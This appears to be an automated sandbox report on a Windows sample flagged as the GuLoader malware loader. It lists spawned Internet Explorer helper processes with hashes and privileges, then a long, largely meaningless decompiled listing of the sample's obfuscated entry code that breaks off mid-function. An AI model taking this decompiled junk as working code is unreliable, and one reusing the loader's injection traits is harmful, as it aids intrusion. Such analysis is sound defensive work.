Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6776 Parent PID: 908

General

Start time:	10:53:09
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6848 Parent PID: 908

General

Start time:	10:53:10
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6908 Parent PID: 908

General

Start time:	10:53:10
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6988 Parent PID: 908

General

Start time:	10:53:10
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 7012 Parent PID: 908

General

Start time:	10:53:11
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 7056 Parent PID: 908

General

Start time:	10:53:11
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0x3c0000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ielowutil.exe PID: 7084 Parent PID: 908

General

Start time:	10:53:11
Start date:	08/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ielowutil.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.exe'
Imagebase:	0xa80000
File size:	221184 bytes
MD5 hash:	D1F5C3244A69511CAC88009B71884A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000016.00000002.570071221.0000000002AD1000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.generic.ml.exe PID: 908 Parent PID: 5804 SecuriteInfo.com.generic.ml.exeCOMMON

Executed Functions

Function 004012D4, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 1041
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			_entry_(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {

				_push("VB5!6&*"); // executed
				L004012CE(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_push(es);
				if( *__eax != 0) {
					return __imp____vbaFpI4();
				}
				_t1 = __eax;
				__eax = __ebx;
				__ebx = _t1;
				asm("sbb [ebp+0x48], cl");
				 *((char*)(__edx + 8)) = __ch;
				__ebx = _t1 + 1;
				_t3 = __eax;
				__eax = _t1 + 1;
				__ebx = _t3;
				__esi = 0xffbb;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax = __eax +  *__eax;
				 *__eax =  *__eax + __al;
				__ecx = __ecx + 1;
				 *0x4202820B =  *((intOrPtr*)(0x4202820b)) + __al;
				__ecx = __ecx + 1;
				__edi = __edi + 1;
				__esp = __esp + 1;
				__ecx = __ecx - 1;
				 *0xffbb =  *0xffbb + __ch;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				__esp = __esp - 1;
				 *__eax =  *__eax ^ __eax;
				__eax = __eax & 0xee2dd2b6;
				 *0x058848EB =  *0x058848EB | 0x00000054;
				__eflags =  *0x058848EB;
				asm("sbb cl, [esi]");
				_t8 = __eax;
				__eax = __edx;
				__edx = _t8;
				asm("insb");
				asm("popfd");
				_t9 = __eax;
				__eax = __ecx;
				__ecx = _t9;
				if( *0x058848EB >= 0) {
					asm("out 0xb6, al");
					asm("adc [eax+0x44068a47], eax");
					asm("stosd");
					__ah = __ah - __bh;
					__al = __al &  *(__ecx + 0x3a);
					__edi = __edi - 1;
					asm("lodsd");
					__ebx = __ebx ^  *(__ecx - 0x48ee309a);
					asm("stosb");
					 *((intOrPtr*)(__eax - 0x2d)) =  *((intOrPtr*)(__eax - 0x2d)) + __ah;
					_t14 = __eax;
					__eax = __ebx;
					__ebx = _t14;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
				}
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *((intOrPtr*)(0x470000 + __eax * 4)) =  *((intOrPtr*)(0x470000 + __eax * 4)) + __ch;
				 *__eax =  *__eax + __al;
				 *0x544c4100 =  *0x544c4100 + __al;
				_push(__edx);
				_push(__ebp);
				 *0x53000a01 =  *0x53000a01 + __cl;
				__eflags =  *0x53000a01;
				if(__eflags == 0) {
					L12:
					__eax = __eax + 0x64000901;
					asm("gs insb");
					goto L13;
				} else {
					if(__eflags < 0) {
						L11:
						__esp = __esp + 1;
						__ebp = __ebp + 1;
						__esp = __esp - 1;
						__ebp = __ebp - 1;
						__ecx = __ecx + 1;
						__edi = __edi + 1;
						 *0x64000901 =  *0x64000901 + __al;
						__eflags =  *0x64000901;
						goto L12;
					} else {
						if(__eflags != 0) {
							L13:
							if(__eflags < 0) {
								goto L28;
							} else {
								asm("outsd");
								asm("bound ebp, [ebp]");
								goto L15;
							}
						} else {
							asm("bound esi, [ebp+0x38]");
							 *__ecx =  *__ecx + __bl;
							 *__eax = __eax +  *__eax;
							__edx = __edx + 1;
							 *__edx =  *__edx + __ah;
							 *((intOrPtr*)(__edx + __ecx)) =  *((intOrPtr*)(__edx + __ecx)) + __ah;
							_t21 = __ebx + 0x74;
							 *_t21 =  *(__ebx + 0x74) + __dl;
							__eflags =  *_t21;
							asm("outsd");
							if(__eflags < 0) {
								L15:
								__eax = __eax + 0x7b205f1;
								__eflags = __eax;
								goto L16;
							} else {
								if(__eflags != 0) {
									L19:
									__al = __al;
									 *__eax =  *__eax + __al;
									__ecx = __ecx +  *__ecx;
									_t34 = __edx + 0x61;
									 *_t34 =  *(__edx + 0x61) + __al;
									__eflags =  *_t34;
									if(__eflags < 0) {
										L30:
										__ebp =  *(__esi + 0x67) * 0x24050069;
										__eflags = __ebp;
										goto L31;
									} else {
										if(__eflags < 0) {
											L32:
											_t54 = __eax + 1;
											 *_t54 =  *(__eax + 1) | __dh;
											__eflags =  *_t54;
											goto L33;
										} else {
											if(__eflags != 0) {
												L31:
												__eax =  *(__bx + __si) * 0x7052405;
												__eflags = __eax;
												goto L32;
											} else {
												 *[ss:0x54000901] =  *[ss:0x54000901] + __al;
												__eflags =  *[ss:0x54000901];
												asm("outsd");
												if(__eflags < 0) {
													L33:
													if(__eflags >= 0) {
														_t56 = __edx + __edx;
														 *_t56 =  *(__edx + __edx) ^ __eax;
														__eflags =  *_t56;
													}
													__al = __al + 0x12;
													__al = __al;
													 *__ebx =  *__ebx + 1;
													__eax = __eax -  *__eax;
													 *__eax =  *__eax + __al;
													_push(es);
													 *__eax =  *__eax | __eax;
													__eflags =  *__eax;
													goto L36;
												} else {
													if(__eflags < 0) {
														L36:
														__ebp =  *(__ebp + 0x70) * 0x61626f72;
														asm("bound ebp, [ecx]");
														__eax = __eax + 0x45000801;
														__eflags = __eax;
														asm("popad");
														if(__eflags < 0) {
															L43:
															asm("bound esp, [ecx+0x72]");
															 *0x4d000701 =  *0x4d000701 + __al;
															__eflags =  *0x4d000701;
															asm("outsd");
															if( *0x4d000701 != 0) {
																L48:
																__al = __al;
																__eflags = __al;
																asm("bound esp, [ecx+0x72]");
																if(__al < 0) {
																	goto L56;
																} else {
																	 *0x7070579 =  *0x7070579 + __al;
																	__eflags =  *0x7070579;
																	__eax = __eax + 0x7070579;
																	__eflags = __eax;
																	if(__eax < 0) {
																		asm("arpl [ebx], ax");
																		asm("adc cl, [ebx]");
																	}
																	__bh = __bh + __bh;
																	__esp =  *__esi + __esp;
																	 *__eax =  *__eax + __al;
																	 *0x48500008 =  *0x48500008 + __cl;
																	__ecx = __ecx + 1;
																	__ebp = __ebp + 1;
																	__edi = __edi - 1;
																	__eax = __eax - 1;
																	__ecx = __eax;
																	 *0x43000401 =  *0x43000401 + __al;
																	__eax = __eax - 1;
																	__ebp = __ebp + 1;
																	__ebp = __ebp - 1;
																	 *0x83a0278 =  *0x83a0278 + __al;
																	 *__ebx =  *__ebx + 0xc1204;
																	 *__ebx =  *__ebx + 1;
																	__al = __al -  *__eax;
																	 *__eax =  *__eax + __al;
																	es = cs;
																	_t72 = __ebx + 0x74;
																	 *_t72 =  *(__ebx + 0x74) + __dl;
																	__eflags =  *_t72;
																	if( *_t72 == 0) {
																		__eax = __eax + 0xf120486;
																		__bh = __bh + __bh;
																		__ebp = __ebp +  *__eax;
																		 *__eax =  *__eax + __al;
																		 *__ecx =  *__ecx + __dl;
																		 *__eax =  *__eax | __eax;
																		_push(__ebp);
																		__esp = __esp + 1;
																		__esp = __esp - 1;
																		__edx = __edx + 1;
																		_push(__ebx);
																		__esp = __esp + 1;
																		__ecx = __ecx + 1;
																		__edi = __edi + 1;
																		__edx = __edx + 1;
																		 *0x50000501 =  *0x50000501 + __al;
																		__eflags =  *0x50000501;
																		asm("insb");
																		asm("gs outsb");
																		if ( *0x50000501 != 0) goto L62;
																		__eax = __eax + 0x46b0122;
																		asm("sbb eax, 0x12058608");
																		goto L63;
																	} else {
																		asm("arpl [eax+eax], si");
																		__eax = __eax + 0x43000901;
																		asm("outsd");
																		asm("outsb");
																		__ebp =  *(__esi + 0x69) * 0x356964;
																		__eax = __eax + 0x41601f0;
																		__ebp =  *(__esi + 0x69) * 0x356964 - 1;
																		__ebp =  *(__esi + 0x69) * 0x356964 - 1 + __ebx;
																		_pop(es);
																		asm("adc cl, [0x2603ff00]");
																		 *__eax =  *__eax + __al;
																		 *__edi =  *__edi + __cl;
																		_pop(es);
																		_t75 = __ebx + 0x76;
																		 *_t75 =  *(__ebx + 0x76) + __dl;
																		__eflags =  *_t75;
																		goto L54;
																	}
																}
															} else {
																asm("outsb");
																 *[gs:eax] =  *[gs:eax] ^ __eax;
																__eax = __eax + 0x43903ce;
																asm("clc");
																__al = __al +  *((intOrPtr*)(__eax + 3));
																asm("adc cl, [eax]");
																__bh = __bh + __bh;
																__esp = __esp +  *__edx;
																 *__eax =  *__eax + __al;
																 *__edx =  *__edx + __cl;
																__al = __al;
																asm("bound esi, [edx+0x61]");
																_push(0x4010500);
																 *((intOrPtr*)(__ecx + 0x43)) =  *((intOrPtr*)(__ecx + 0x43)) + __cl;
																__ecx = __ecx + 1;
																_push(__edx);
																 *0x7e50346 =  *0x7e50346 + __al;
																 *0x91206ba =  *0x91206ba + 0x2b03ff00;
																 *__eax =  *__eax + __al;
																 *__ebx =  *__ebx + __cl;
																 *__eax =  *__eax | __eax;
																__edi = __edi - 1;
																__eflags = __edi;
																__esp = __esp - 1;
																__ecx = __eax;
																__esi = __esi - 1;
																__ecx = __ecx - 1;
																__esi = __esi - 1;
																__edi = __edi + 1;
																 *0x67000801 =  *0x67000801 + __al;
																asm("gs outsd");
																__esi =  *(__ebx + 0x6f) * 0x5006874;
																__eax = __eax &  *__ebx;
																__eflags =  *__esi - __eax;
																 *((char*)(__ebx + __ebx * 8)) = 4;
																asm("adc cl, [edx]");
																__bh = __bh + __bh;
																__esp = __esp +  *0xc000000;
																es = __ebx;
																_t70 = __ebx + 0x61;
																 *_t70 =  *(__ebx + 0x61) + __dl;
																__eflags =  *_t70;
																asm("insd");
																if(__eflags < 0) {
																	L54:
																	_push(__ebx);
																	if(__eflags <= 0) {
																		L63:
																		_t79 = __esi + 0x101205;
																		 *_t79 =  *(__esi + 0x101205) | __al;
																		__eflags =  *_t79;
																		asm("adc [eax], al");
																		 *__ebx =  *__ebx + 1;
																		__eax = __eax & 0x12000000;
																		_push(es);
																		_t81 = __ebx + 0x74;
																		 *_t81 =  *(__ebx + 0x74) + __dl;
																		__eflags =  *_t81;
																		if(__eflags < 0) {
																			L71:
																			asm("lds eax, [ecx]");
																			_t90 = __eax;
																			__eax = __esi;
																			__esi = _t90;
																			__edx = __edx +  *__edx;
																			asm("adc eax, [eax]");
																			 *__ebx =  *__ebx + 1;
																			 *__eax =  *__eax - __eax;
																			 *__eax =  *__eax + __al;
																			asm("adc eax, 0x72460009");
																			goto L72;
																		} else {
																			asm("o16 add [0x53000501], al");
																			asm("popad");
																			asm("popad");
																			if(__eflags < 0) {
																				L72:
																				__esi = __esi + 1;
																				__eflags = __esi;
																				if(__eflags < 0) {
																					goto L85;
																				} else {
																					asm("a16 jz 0x76");
																					if(__eflags == 0) {
																						goto L86;
																					} else {
																						asm("popad");
																						asm("insb");
																						asm("popad");
																						 *0x69000601 =  *0x69000601 + __al;
																						__eflags =  *0x69000601;
																						asm("outsb");
																						if(__eflags >= 0) {
																							if(__eflags < 0) {
																								goto L100;
																							} else {
																								if(__eflags < 0) {
																									goto L99;
																								} else {
																									 *0x36b0178 =  *0x36b0178 + __al;
																									__esi = __esi - 1;
																									__edi = __edi +  *((intOrPtr*)(__ecx + 0x171204));
																									 *__ebx =  *__ebx + 1;
																									asm("daa");
																									 *__eax =  *__eax + __al;
																									 *__ecx =  *__ecx + __bl;
																									 *__eax =  *__eax | __al;
																									__ecx = __ecx - 1;
																									__esi = __esi - 1;
																									_push(__edx);
																									__ebp = __ebp + 1;
																									__edi = __edi + 1;
																									__ecx = __ecx - 1;
																									_push(__ebx);
																									_push(__esp);
																									 *0x53000501 =  *0x53000501 + __al;
																									asm("arpl [edi+0x6c], bp");
																									__eflags =  *__eax - __al;
																									__eax = __eax + 0x6b10647;
																									__eflags = __eax;
																									if(__eax < 0) {
																										__ecx = 0x181205;
																									}
																									 *__ebx =  *__ebx + 1;
																									 *__eax =  *__eax - __eax;
																									 *__eax =  *__eax + __al;
																									asm("sbb cl, [eax]");
																									_t100 = __edx + 0x79;
																									 *_t100 =  *(__edx + 0x79) + __al;
																									__eflags =  *_t100;
																									if( *_t100 < 0) {
																										goto L105;
																									} else {
																										__esi =  *__ebp * 0x70105;
																										_push(__esp);
																										__ebp =  *(__edx + 0x61) * 0x5003467;
																										asm("stosd");
																										__ecx = __ecx +  *((intOrPtr*)(__ebp + 0x6207fa02));
																										 *__edx = __edx +  *__edx;
																										asm("sbb [eax], eax");
																										 *__ebx =  *__ebx + 1;
																										__eflags =  *__ebx;
																										__ebp = __ebp +  *__edx;
																										 *__eax =  *__eax + __al;
																										 *__ebx =  *__ebx + __bl;
																										 *__eax =  *__eax | __eax;
																										__eflags =  *__eax;
																										goto L96;
																									}
																								}
																							}
																						} else {
																							asm("arpl [gs:eax], ax");
																							__eax = __eax + 0x2b0079c;
																							__eflags = __eax;
																							goto L77;
																						}
																					}
																				}
																			} else {
																				 *0x25b086a =  *0x25b086a + __al;
																				asm("salc");
																				__dh = __dh +  *__eax;
																				 *__edx = __edx +  *__edx;
																				asm("adc [eax], eax");
																				 *__ebx =  *__ebx + 1;
																				 *[es:eax] =  *[es:eax] + __al;
																				 *__ebx =  *__ebx + __dl;
																				 *__eax =  *__eax | __al;
																				__ecx = __ecx + 1;
																				__eflags = __ecx;
																				if(__eflags == 0) {
																					L78:
																					_pop(es);
																					 *((intOrPtr*)(__edx + 0x75)) =  *((intOrPtr*)(__edx + 0x75)) + __cl;
																					asm("insb");
																					asm("popad");
																					asm("o16 jz 0x3");
																					__eax = __eax + 0x61000501;
																					__eflags = __eax;
																					asm("o16 jz 0x75");
																					if (__eax >= 0) goto L79;
																					__eax = __eax + 0x65c0501;
																					__eflags = __eax;
																					if(__eax < 0) {
																						asm("invd");
																						asm("adc dl, [0x2403ff00]");
																					}
																					__esp = __esp +  *((intOrPtr*)(__eax + __eax));
																					 *__eax =  *__eax + __al;
																					__eflags =  *__eax;
																					_pop(ss);
																					_push(es);
																					goto L82;
																				} else {
																					if(__eflags < 0) {
																						L77:
																						_pop(es);
																						__al = 2;
																						asm("aad 0x1");
																						_t91 = __eax;
																						__eax = __esi;
																						__esi = _t91;
																						__al = 0x14;
																						asm("adc al, 0x0");
																						 *__ebx =  *__ebx + 1;
																						 *[es:eax] =  *[es:eax] + 2;
																						 *__esi =  *__esi + __dl;
																						__eflags =  *__esi;
																						goto L78;
																					} else {
																						__esi =  *(__esp + __esi) * 5;
																						 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
																						__edx = __edx + 1;
																						asm("insb");
																						asm("arpl [gs:eax], ax");
																						__eax = __eax + 0x87f0847;
																						asm("sbb al, [edx]");
																						_push(cs);
																						__eax = __eax + 0xff001212;
																						__esp = __esp +  *__edi;
																						 *__eax =  *__eax + __al;
																						 *((intOrPtr*)(__eax + 0x6d654400)) =  *((intOrPtr*)(__eax + 0x6d654400)) + __dl;
																						__esi =  *(__eax + __eax + 5) * 0x72000801;
																						__eflags = __esi;
																						if(__eflags != 0) {
																							L83:
																							__eax = __eax + 0x48000401;
																							__esp = __esp - 1;
																							__edi = __edi - 1;
																							__esi = __esi + 1;
																							 *0x4b106f2 =  *0x4b106f2 + __al;
																							__eflags =  *0x4b106f2;
																							 *0x12063103 = __eax;
																							_push(ss);
																							__bh = __bh + __bh;
																							__esp = __esp +  *0x18000000;
																							_push(es);
																							_t97 = __eax + 0x6f;
																							 *_t97 =  *(__eax + 0x6f) + __dh;
																							__eflags =  *_t97;
																							L85:
																							if (__eflags < 0) goto L96;
																							L86:
																							if(__eflags == 0) {
																								L96:
																								__edi = __edi - 1;
																								__eflags = __edi;
																								if(__eflags <= 0) {
																									L110:
																									if (__eflags >= 0) goto L112;
																									goto L111;
																								} else {
																									if(__eflags < 0) {
																										L111:
																										 *0x2e304f1 =  *0x2e304f1 + __al;
																										__eflags =  *0x2e304f1;
																										__eax = __eax + 0x2e304f1;
																										asm("cli");
																										__fp0 = __fp0 +  *__esi;
																										asm("adc bl, [eax+eax]");
																										 *__ebx =  *__ebx + 1;
																										 *[es:eax] =  *[es:eax] + __al;
																										 *__esi =  *__esi + __bl;
																										es = es;
																										_t114 = __ebx + 0x6f;
																										 *_t114 =  *(__ebx + 0x6f) + __ah;
																										__eflags =  *_t114;
																										goto L113;
																									} else {
																										asm("bound ebp, [gs:ecx+0x37]");
																										 *0x6d000701 =  *0x6d000701 + __al;
																										__eflags =  *0x6d000701;
																										L99:
																										_t104 = __ebp + 0x69;
																										 *_t104 =  *(__ebp + 0x69) + __ch;
																										__eflags =  *_t104;
																										L100:
																										asm("insd");
																										if(__eflags >= 0) {
																											L113:
																											asm("insb");
																											if(__eflags != 0) {
																												goto L129;
																											} else {
																												asm("bound ebp, [ecx]");
																												__eax = __eax + 0x46000501;
																												__eflags = __eax;
																												if(__eax < 0) {
																													goto L130;
																												} else {
																													asm("insb");
																													__eflags =  *__eax - __eax;
																													__eax = __eax + 0x68f0255;
																													 *__ebx = 0x85;
																													__dl = __dl +  *__edx;
																													asm("sbb eax, 0x2603ff00");
																													goto L116;
																												}
																											}
																										} else {
																											 *[gs:0xe2059c] =  *[gs:0xe2059c] + __al;
																											__al = __al - 5;
																											__ecx = __ecx + 1;
																											__eax = __eax + 0xff001a12;
																											__esp = __esp +  *__edi;
																											 *__eax =  *__eax + __al;
																											 *((intOrPtr*)(__eax + __esi)) =  *((intOrPtr*)(__eax + __esi)) + __bl;
																											 *((intOrPtr*)(__ecx + 0x4d + __ecx * 2)) =  *((intOrPtr*)(__ecx + 0x4d + __ecx * 2)) + __cl;
																											__edx = __edx + 1;
																											__edi = __edi - 1;
																											_push(__ebp);
																											 *0x50000701 =  *0x50000701 + __al;
																											__eflags =  *0x50000701;
																											if(__eflags < 0) {
																												L119:
																												if(__eflags >= 0) {
																													goto L126;
																												} else {
																													 *0x53000401 =  *0x53000401 + __al;
																													_push(__esp);
																													__ecx = __ecx + 1;
																													_push(__esp);
																													 *0x4e40446 =  *0x4e40446 + __al;
																													__eflags =  *0x4e40446;
																													goto L121;
																												}
																											} else {
																												if(__eflags == 0) {
																													L116:
																													 *__eax =  *__eax + __al;
																													 *__edi =  *__edi + __bl;
																													 *__eax =  *__eax | __al;
																													__eflags =  *__eax;
																													goto L117;
																												} else {
																													if(__eflags <= 0) {
																														L117:
																														__esi = __esi + 1;
																														__eflags = __esi;
																														if(__esi != 0) {
																															goto L136;
																														} else {
																															__ebp =  *(__edi + 0x6e) * 0x5003373;
																															__eflags = __ebp;
																															goto L119;
																														}
																													} else {
																														 *0x1b007f2 =  *0x1b007f2 + __al;
																														asm("salc");
																														__al = __al + 0xdc;
																														__eax = __eax + 0xff001b12;
																														__eflags = __eax;
																														L105:
																														asm("adc bl, [ebx]");
																														__bh = __bh + __bh;
																														__ebp = __ebp +  *__ebx;
																														 *__eax =  *__eax + __al;
																														 *0x66410008 =  *0x66410008 + __bl;
																														__eflags =  *0x66410008;
																														if(__eflags >= 0) {
																															L122:
																															_push(ds);
																															__bh = __bh + __bh;
																															__ebp = __ebp +  *__eax;
																															 *__eax =  *__eax + __al;
																															 *__eax =  *__eax + __ah;
																															 *__eax =  *__eax | __eax;
																															__eflags =  *__eax;
																															asm("bound ebp, [edi+ebp*2+0x75]");
																															if( *__eax >= 0) {
																																goto L138;
																															} else {
																																asm("outsb");
																																_push(0x61);
																																 *0x41000501 =  *0x41000501 + __al;
																																__eflags =  *0x41000501;
																																goto L124;
																															}
																														} else {
																															if(__eflags < 0) {
																																L121:
																																__al = __al + 0xe4;
																																__al = __al + 0xf8;
																																_t117 = __esi + __eax + 0x12;
																																 *_t117 =  *(__esi + __eax + 0x12) + __ah;
																																__eflags =  *_t117;
																																goto L122;
																															} else {
																																asm("bound esi, [ebx]");
																																 *0x4d000901 =  *0x4d000901 + __al;
																																__eflags =  *0x4d000901;
																																asm("outsd");
																																if(__eflags >= 0) {
																																	L124:
																																	__eax = __eax + 0x65644100;
																																	__eflags = __eax;
																																	goto L125;
																																} else {
																																	if(__eflags == 0) {
																																		L125:
																																		__ecx = __ecx + 1;
																																		__eflags = __ecx;
																																		asm("gs insb");
																																		if (__ecx >= 0) goto L126;
																																		L126:
																																		__eax = __eax + 0x5b1069c;
																																		__eflags = __eax;
																																		if(__eax >= 0) {
																																			asm("in al, dx");
																																			__al = __al + 0x12;
																																			_pop(ds);
																																			__bh = __bh + __bh;
																																			__ebp = __ebp +  *((intOrPtr*)(__eax + __eax));
																																			__eflags = __ebp;
																																		}
																																		 *__eax =  *__eax + __al;
																																		__eflags =  *__eax;
																																		L129:
																																		 *__eax =  *__eax + __al;
																																		__eflags =  *__eax;
																																		L130:
																																		 *__ecx =  *__ecx & __ecx;
																																		_t122 = __ebx + 0x74;
																																		 *_t122 =  *(__ebx + 0x74) + __dl;
																																		__eflags =  *_t122;
																																		if(__eflags < 0) {
																																			L143:
																																			__al = __al & 0x0000007f;
																																			 *__eax =  *__eax + __al;
																																			__eax = __eax & 0x74730006;
																																			__eflags = __eax;
																																			goto L144;
																																		} else {
																																			if (__eflags != 0) goto L142;
																																			if(__eflags != 0) {
																																				L142:
																																				__esp = __esp +  *((intOrPtr*)(__edi + __edi * 2));
																																				__eflags = __esp;
																																				goto L143;
																																			} else {
																																				asm("a16 jb 0x4");
																																				__eax = __eax + 0x47000901;
																																				__eflags = __eax;
																																				if(__eflags != 0) {
																																					L144:
																																					if(__eflags != 0) {
																																						__ebp =  *__ebp * 0;
																																						__edi = __edi + __esi;
																																						__eflags = __edi;
																																						if (__edi <= 0) goto L146;
																																						_t128 = __esp + __esi * 2;
																																						 *_t128 =  *(__esp + __esi * 2) + __ch;
																																						__eflags =  *_t128;
																																						__dh = __dh + __dh;
																																						__eflags = __dh;
																																						if (__dh <= 0) goto L148;
																																						 *((intOrPtr*)(__edx + 0x4d)) =  *((intOrPtr*)(__edx + 0x4d)) + __al;
																																						__edx = __edx - 1;
																																						__eflags = __eax & 0x00002702;
																																						 *__eax =  *__eax + __al;
																																						 *[ss:eax] =  *[ss:eax] + __al;
																																						 *__eax =  *__eax + __ch;
																																						 *__eax =  *__eax + __al;
																																						_t136 = __eax + 0x27000001;
																																						 *_t136 =  *(__eax + 0x27000001) + __ah;
																																						__eflags =  *_t136;
																																						goto L149;
																																					}
																																				} else {
																																					asm("popad");
																																					asm("insb");
																																					if (__eflags < 0) goto L135;
																																					__eax = __eax + 0x6e4039b;
																																					asm("lds eax, [edx]");
																																					 *__edi =  *__edi + 1;
																																					asm("adc ah, [eax]");
																																					__bh = __bh + __bh;
																																					__esp = __esp +  *__edi;
																																					__eflags = __esp;
																																					L136:
																																					asm("daa");
																																					 *__eax =  *__eax + __al;
																																					 *__edx =  *__edx + __ah;
																																					 *__eax =  *__eax | __eax;
																																					_push(__ebx);
																																					_push(__esp);
																																					__ebp = __ebp + 1;
																																					__ebp = __ebp - 1;
																																					__ebp = __ebp - 1;
																																					__ebp = __ebp + 1;
																																					__esp = __esp - 1;
																																					__ebp = __ebp + 1;
																																					__edx = __edx - 1;
																																					 *0x74000401 =  *0x74000401 + __al;
																																					__eflags =  *0x74000401;
																																					asm("popad");
																																					if( *0x74000401 < 0) {
																																						L149:
																																						 *__eax = __eax +  *__eax;
																																						 *__edi =  *__edi + __ah;
																																						 *__eax =  *__eax + __al;
																																						 *__ecx =  *__ecx + __al;
																																						 *__eax =  *__eax + __dl;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						__al = __al + __al;
																																						__eflags = __al;
																																						if (__al <= 0) goto L150;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						 *__eax =  *__eax + __al;
																																						__eflags =  *__eax;
																																						goto L151;
																																					} else {
																																						 *0x2c00100 =  *0x2c00100 + __al;
																																						__esi = __esi - 1;
																																						__eax = __eax + 0x21120195;
																																						__bh = __bh + __bh;
																																						__eflags = __bh;
																																						L138:
																																						 *__ebx =  *__ebx + 1;
																																						 *[es:eax] =  *[es:eax] + __al;
																																						 *__ebx =  *__ebx + __ah;
																																						_push(es);
																																						_t124 = __ebx + 0x70;
																																						 *_t124 =  *(__ebx + 0x70) + __dl;
																																						__eflags =  *_t124;
																																						asm("popad");
																																						if( *_t124 < 0) {
																																							L151:
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							 *__eax =  *__eax + __al;
																																							__eflags =  *__eax;
																																						} else {
																																							asm("insd");
